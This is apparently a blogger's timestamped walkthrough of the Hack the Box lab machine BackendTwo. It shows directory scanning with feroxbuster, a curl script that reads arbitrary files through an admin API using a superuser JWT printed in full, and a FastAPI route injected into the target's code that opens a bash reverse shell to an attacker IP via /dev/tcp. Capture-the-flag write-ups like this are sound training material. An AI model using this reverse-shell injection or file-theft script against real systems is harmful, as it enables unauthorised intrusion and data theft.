Hack the Box : BackendTwo

You need to read python codes and find where the files are.

Fun Box!

Now I’m using a sever with 4GB memory, as 2GB memory is not enough.

I wonder how much aws w charge me…

00:24 feroxbuster

I ran feroxbuster and dirb.

Feroxbuster showed results before dirb did, so I canceled dirb.

feroxbuster | Kali Linux Tools

sudo apt install feroxbuster

feroxbuster -u http://10.10.11.162 --force-recursion -C 404,405 -m GET,POST

./feroxbuster -u http://10.10.11.162 -H Accept:application/json "Authorization: Bearer {token}"

curl https://10.10.11.162
   -H "Accept: application/json"
   -H "Authorization: Bearer {token}"

04:45 get_file.sh

Encode input filename to base64, then exec curl command.

#!/bin/bash

JWTTOKEN=eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJ0eXBlIjoiYWNjZXNzX3Rva2VuIiwiZXhwIjoxNjYxNDc0MjAyLCJpYXQiOjE2NjA3ODMwMDIsInN1YiI6IjEyIiwiaXNfc3VwZXJ1c2VyIjp0cnVlLCJndWlkIjoiNmUwM2MyM2EtMjYyNy00ZWY0LWI0M2QtNWMyY2Q3ZGJmOWM0In0.bxxO2p3VQGpHFfeK7lLAOmJNBo_gzf8otN1--BhKQCw

base64_url=$(echo -n $1 | base64 | tr '/+' '_-' | tr -d  '=')

curl -s http://10.10.11.162/api/v1/admin/file/${base64_url} -H "Authorization: bearer $JWTTOKEN" | jq .file -r

+ and / are special chars, so replace them with _ and – like below.

 echo -n "6+6is_f/ine-T" | tr '/+' '_-'
6-6is_f_ine-T

Then trim = in the end.

Reference and here too.

jq makes json return readable.

.file option takes only file element. -r removes ¥n . reference

06:30 JSON escape

Free Online JSON Escape / Unescape Tool - FreeFormatter.com

A free online tool to escape or unescape JSON strings

06:38 Prepare script to send user.py

@router.delete("/ReverseShell", status_code=200 )
def exe_reverse( ) -> Any:
    """
    exec reverse shell
    """
    import os
    os.system("bash -c 'bash -i >& /dev/tcp/10.10.14.8/1234 0>&1'")
    return

@router.get did not work. I guess get expects some outputs. Then put should expect inputs etc. Delete was the right one.

07:18 sudo -l & PAM-Wordle

find / 2>/dev/null | grep wordle